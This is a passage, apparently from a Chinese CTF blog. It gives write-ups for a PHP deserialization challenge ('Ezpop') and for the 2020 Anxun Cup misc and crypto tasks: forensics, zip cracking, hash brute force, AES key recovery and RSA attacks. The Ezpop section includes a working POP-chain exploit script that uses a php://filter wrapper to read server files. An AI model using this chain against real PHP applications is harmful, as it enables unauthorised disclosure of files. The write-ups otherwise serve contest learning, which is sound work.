21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54


Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

思路：通过 Show 让 Modifier 来 include flag.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


<?php
class Modifier{
    protected $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source=$file;
    }
}
class Test{
    public $p;
    public function __construct($p)
    {
        $this->p=$p;
    }
}
$show1 = new Show('add');
$show2 = new Show($show1);
$m = new Modifier();
$test= new Test($m);
$show1->str=$test;
echo urlencode(serialize($show2));

base64解码就是flag.php的源码了

Ezpop_Revenge

2020安洵杯Misc&Crypto writeup

总体感觉题目没啥营养，全是出烂了的考点，不过还是水个博客。

Misc

签到

一个二维码，扫描关注公众号，恢复flag会给个假的flag，根据hint回复fl4g，得到网盘链接，里面是个word，word里是emoji，不是emojicode，base100解密就是flag

王牌特工

磁盘取证，一个findme文件，是ext3，挂载得到一个 flagbox 和一个key.txt提示如下

1
2


key:a_cool_key
use Veracrypt

用Veracrypt挂载flagbox，一个假flag文件，提示往回看

1

extundelete findme --restore-all

恢复fideme中删除的文件，得到一个 .coolboy.swp 的vim缓存，得到一串base64：55yf55qE5a+G56CBOnRoaXNfaXNfYV90cnVlX2tleQ==真正的密码 this_is_a_true_key，挂载得到flag

套娃

zip题，第一层crc爆破得到密码 !qQIdEa@#!z)

1
2
3
4
5
6


0xea4446b6
0xed7987de
0x46fe0943
0x4be30989
0xb31975c0
0xd6bb1bef

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


# from network
import binascii
import string

def crack_crc():
    crc_list = [0xea4446b6,0xed7987de,0x46fe0943,0x4be30989,0xb31975c0,0xd6bb1bef]
    chars = string.printable
    for res_crc in crc_list:
        for str_1 in chars:
            for str_2 in chars:
                comment = str_1 + str_2
                test_crc = binascii.crc32(comment.encode())
                calc_crc = test_crc & 0xffffffff
                if calc_crc == res_crc:
                    print(comment)

if __name__ == '__main__':
    crack_crc()

第二层明文攻击，做的时候遇到点问题，密码出来 %3#c$v!@ 但是解密文件失败，发现原因了，伪加密去掉就可以正常解密了，或者flag.txt单独拖出来解密也行。

得到一串fgic__notl{prwc__}az&ceadi@，在线解栅栏得到flag{zip&crc_we_can_do_it}@

BeCare4

拿了个一血，这题到最后都450分+是我没想到的

一个文本，想百度找找文章出处，粘贴的时候发现是零宽字节，得到压缩包密码

oh,you found the pass:RealV1siBle

解压后得到图片，直接 silenteye 出flag

Crypto

密码学？爆破就行了

密码签到题，就是爆破，放服务器上跑了一会

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


import hashlib
from string import ascii_lowercase,digits
table = ascii_lowercase+digits
ciphier = '0596d989a2938e16bcc5d6f89ce709ad9f64d36316ab80408cb6b89b3d7f064a'
for a in table:
    for b in table:
        for c in table:
            for d in table:
                for e in table:
                    for f in table:
                        flag = 'd0g3{71b2b5616'+a+b+'2a4639'+c+d+'7d979'+e+f+'de964c}'
                        tmp = hashlib.sha256(flag).hexdigest()
                        if tmp == ciphier:
                            print(flag)
                            exit()

1

d0g3{71b2b5616ee2a4639a07d979ebde964c}

easyaes

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


from Crypto.Util.number import *
from Crypto.Cipher import AES
msg = b'Welcome to this competition, I hope you can have fun today!!!!!!'
hint_key = 56631233292325412205528754798133970783633216936302049893130220461139160682777
last32 = '3c976c92aff4095a23e885b195077b66'
# print(hex(hint_key))
# 0x7d3424647d3424647d3424647d34246419044357064341081e5b4901045b5119L
hint = hex(hint_key)[2:10]*8
key = hint_key^eval('0x'+hint)
key = long_to_bytes(key)
print("key:"+key)
# d0g3{welcomeyou}

aes=AES.new(key,AES.MODE_ECB)

tmp = long_to_bytes(0x3c976c92aff4095a23e885b195077b66)
for i in range(4, 0, -1):
    tmp = aes.decrypt(tmp)
    tmp = long_to_bytes(bytes_to_long(tmp) ^ bytes_to_long(msg[16*(i-1):16*i]))
print(tmp)

easyrsa

challenge1费马小定理开方得到m 即p
challenge2签到水平给个hintFlag is a 764-length number that starts with "太长了，就不贴了，自己跑去。", and CYZ says he can solve the problem if he was given two more numbers
challenge3给了flag高位,e很小,CopperSmith解一波
在线的sage跑似乎出了点小问题，解出x没问题，但是最后运算不知道为啥出错，自己把x贴回来然后long_to_bytes就行了ohhhhhhhhhhhhhhhhhhhhhhhh!You are good at math and crypto ,I hope you have fun today.We should think of not only the small plaintext attack, but also the coppersmith attack when e is smallWHAT?You say you only wanna flag and don' want to talk with me .OK,fine! The flag is : d0g3{e173c0f114c59c2bdea69c67422be407}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47


from Crypto.Util.number import *
from gmpy2 import *
# --------------challenge 1-------------
n = 10050095014547257781432719892909820612730955980465259676378711053379530637537082959157449310691856567584792956476780977871348290765339769265796235196183464082153542864869953748019765139619014752579378866972354738500054872580260903258315293588496063613299656519940131695232458799137629873477475091085854962677524091351680654318535417344913749322340318860437103597983101958967342493037991934758199221146242955689392875557192192462927253635018175615991531184323989958707271442555251694945958064367263082416655380103916187441214474502905504694440020491633862067243768930954759333735863069851757070183172950390134463839187
c = 522627051172673216607019738378749874116772877858344748349627321977492158105699887369893079581450048789131578556338186004983533975454988450450635141267157135506032849129152411194539350100279698888357898902460651973610161382266600081865609650174137113252711515464274593530115825189780860732147803369868525723790644619452538755225868382505974710418995847979384726953915873857530098330095151094837190566851416540540805185485212577333604309698822785682707412587829684108913753204398552196441996201678339688766979634246337855516220753995430266970473808724410357458278585135750810810484678948146374963838334596646926215341
hint1 = 134805774328615624446574490322803283547316698647214138487576352482438867186094276263735342558169004773286779632939369099910639984165263724781958841009573156241531958373198729926012152201548649349842790727259831232277600944618096069835436884888782994513452252257103877595707828731260669076400456300668581565291455061609385003064649522735776446930209884653223939689686840631001863143579575759834304817613040932998629846110770749941179601474484275548912570668460216633586988225562794026430881265344731575650165992321629617982004131413202026628777742093026476064486873565664625105013298396598413667761372217260994853420062861590358
# hint1 = 2 * d + 246810 * e * phi
m = pow(c,hint1,n)
m = iroot(m,2)[0]
print('m',m)
# 234702123
# --------------challenge 2-------------
q = m
e = 0x10001
n = 133561991523711714238641512987809330530212246892569593026319411449791084194115873781301422593495806927875828290629679020098834182528012835469352471635087375406306534880352693134486855968468946334439553553593196889196239169351375517588892769598963002098115826389220099548938169095670740942251209102500450728442583559710183771974489284632651296188035458586935211952691589627681567274801028577256215269233875203212438263987034556969968774119389693056239796736659926866707857937025200924828822267781445721099763436020785585453958594470906716195030613615725126057391084801585533926767137218524047259398886392592317910204988634868663634415285507325190415658931169841182499733179254162060738994027842088553562013488445789594342451823783136881968032197575016845492231433684884872631894561254381663562267075103417879327236182565223877901300392217967589154857009356640377622996801781797109089687661697856930394706016954531077165127402008444818092498106642068414208190583373314287381712963712098566595399301400378116274132918572709221391531621228936206630829355801192700264684469488261781954165940553346889395507153750291402535330239420975542926664420153925171757944018621411265539452424569343708318070259746118326558005521868356304582694159507379335214599839668805877215983938986674084063185863612335339836810044252829401409522709997562887276661672718820881541500852400369184737236082178767653725044900394959369367604992512713490494168594433000695046297712977059205623777990102604073885527049867682390577577616773090662829024271568456346362315351643767420198116229892060385453123572533267805396437865025639093881944841521458804810097550625853182396288247815370818578103543117466070812804267915674186488979548392193291727228018246788487524292081389142018151246889408421936865224469589631518283230229213787648552632437566756058034131355439709320923876063030896228165897498746898125821639893238387694549304110003941329763552493326245073779912107372271854798616245416264801377068163622812994786201580895459712414134184992440395336131037558976058298521312536969408724436512019410835904564817724243688308776888170183074838453466914170790840559860531933430176605716828492670093771129301541861534595181565621644268739349035133062776852304594204220291667924128313579203359827093150911871520605180797438668872585571501531844999598674037998642821148417473110716470439750642781609483016636419373004760601783594025036152924259863627732874940148083408474700265895269165869619971810103499607445649821
p = 689159326758330864205993810270646658558112329195746149991184055909755461246626153920231796960903018393806410715812453949253930576368274228434916375544579284365205241766136566047482065208442992856658212126772417415403473480889927931481129434854332858754668120563818975006384512615022532233244596546830392476321031156328699572283946257730515089543367929326280871305776349305346159311591820455943842203357066465523558715870586535188343603460826231817622511283563179065036619023415848694281294463836320838105950552498785365535923041927491743402053568747113507098917091780797009380675587381805253390649630338055131031679595664055361678114747608302944715308343764678875659039394225950479683967885912291399162609094622980318391045105733088508798371414996479107970975717563552614856114065668728607215268431341079233630995168600896375314067716366181300081684353583326214062788182429536300917720999423489104723824360299238754986351169209709892739317096741609428484854087163771300777717883057028145424827875496235567904291417092378448353222179114362314382900648079547647848024440220204768433974038004942869937932015294078073975703156613070125753344841550872429670559866184492945262960524545894823245933714684747784492095876370443994948425495841
c = 65553658155452064459040687299632299415295760116470555100400688788937893101658136830409082198753928673469636810831761104117535054304536941814523449491308187105740319828511969750359402834799486354958723098881095067882833993358468923611118977258293638107874383059048015701807718209929028151240509801801995570592890519253676774278321334154528938199389248563657673061299152526380072934917964488153875744843855913524788571997024947738868563951687976817548296078497817264410193882661874749304071168979787307490320366615899942861059615405569154961435894469325778407081182151320629413711622905703628430999201763846682516985530373643176026602901129520439581385946775511292435206913016381293219606333035648747877313424616408338829137581998558399694071257787294948211441360283876078405831210625321012072477187438320944119825970347654743794743846351762763177440045084761025728597526592892602263484022280653040195670941221493307430623213388669939114424884078502946247136016528925968280034099568454876076717790529204207317485416329062672971939549478648687894958552760953682796211975576320713576155031581257782352223857605149825435939889497465805857339911597479498085071301601506276220487493620870555545057189236870008182212284992968466451864806648279032294546676543599599279519394341289357968292292966055189578253350591765186079486142930848439238134776982658066494378507873003509820326863340562093906137812952544399266821679905073464535234547335867090392493005792528534561846391285698943396889671437127470587837989050518266365099789392584686615435440486086402941357614369171354355307532351370775920044953381482310949663868493911752104873824099597326393857349237228788875273525189373323552519106738497767546337587947368062413334887230166285909705065920918078052826480092129173127887307158867274895914733110276134124505178182548094607594799978378381804502097507167978950926067243870989514735314054362049917668015341349933704885009878192354865067520219676784278082055728039064858769077997521541853184489175120623176481708269464933868222226748491078319156602229948646960513946846417957356535995079525993783278312017766715177078804065822913241465133977233398851120059496221650357891946344151601586169979516826622503491746992282716591488199657450776596383692706657692673860134555990821730412919497018889046615548520878486492644159735144935329502984929679831356967030870226422768447430410031028770529758721438528263719267616233686813781828066547393953352033364851486926368090757420184816634373721
# r = n//q//p
# phi = (p-1)*(q-1)*(r-1)
n = n//q
r = n//p
phi = (p-1)*(r-1)
d = invert(e,phi)
hint2 = pow(c,d,n)
# print(hint2)
print(long_to_bytes(hint2))
'''
Flag is a 764-length number that starts with "11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047",
and CYZ says he can solve the problem if he was given two more numbers
'''
# --------------challenge 3-------------
e = 5
n = 14857387925078594782296815160632343246361073432459148990826882280149636079353743233970188012712079179396872746334143946166398665205889211414809061990804629906990919975187761209638578624750977626427334126665295876888197889611807587476285991599511809796600855689969285611439780660503760599419522224129074956376232480894299044645423966132497814477710701209588359243945406653547034819927990978087967107865071898215805154003530311865483912924517801551052430227039259201082691698480830966567550828053196299423168934840697637891311424286534363837640448614727396254288829197614805073711893711252067987576745683317789020760081
c = 14035143725862612299576867857272911865951893239411969382153274945929406881665641140566462510177132511558933111728871930062074990934496715765999564244916409345156132996227113853067808126894818934327468582686975383715892108247084995817427624992232755966398834682079985297050358462588989699096264155802168300026093598601350106309023915300973067720164567785360383234519093637882582163398344514810028120555511836375795523327469278186235781844951253058134566846816114359878325011207064300185611905609820210904126312524631330083758585084521500322528017455972299008481301204209945411774541553636405290572228575790342839240414
'''
# sagemath
m_high = 11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047
R.<x> = PolynomialRing(Zmod(n))
f = (m_high * (10**54)+ x) ** 5 - c
solve = f.monic().small_roots(X=2 ^ 200, beta=1)
x = solve[0]
# 这里在线sage跑出来会错，直接打印x然后贴回来就好
flag = (m_high * (10**54)+ x)
print(x)
'''
flag = 11239443406846515682004397310032293056196968050880696884154193656922259582646354037672076691689208477252910368708578177585615543361661522949580970926775441873118707711939955434559752380028881505457190152150478041765407640575502385319246850488337861927516356807100066882854088505873269444400308838674080495033363033991690519164414435127535585042743674610057871427247713644547353814013986225161074642240309387099685117406015368485154286173113005157000515600312732288515034433615484030112726976498694980213882676667079898254165734852012201534408980237760171665298653255766622300299965621344582683558980205175837414319653422202527631026998128129244251471772428535748417136102640398417683727976117490109918895485047675003330981130439478093707252121278358852500850751357
print(long_to_bytes(flag))

2020CTF WP

2020RoarCTF Misc Writeup

签到

Hi_433MHz

FM

2020SWPUCTF Misc&Crypto Writeup

Misc

套娃

耗子尾汁

来找我吧

来猜谜吧

Crypto

happy

2020西湖论剑Misc部分wp

Yusa_yyds

Yusapapa

指鹿为马

Barbar

第一届太湖杯Misc题解

memory

misc

broken_secret

2020MRCTF writeup

ez_bypass

你传你🐎呢

PYwebsite

套娃

Ezaudit

Ezpop

Ezpop_Revenge

2020安洵杯Misc&Crypto writeup

Misc

签到

王牌特工

套娃

BeCare4

Crypto

密码学？爆破就行了

easyaes

easyrsa

See Also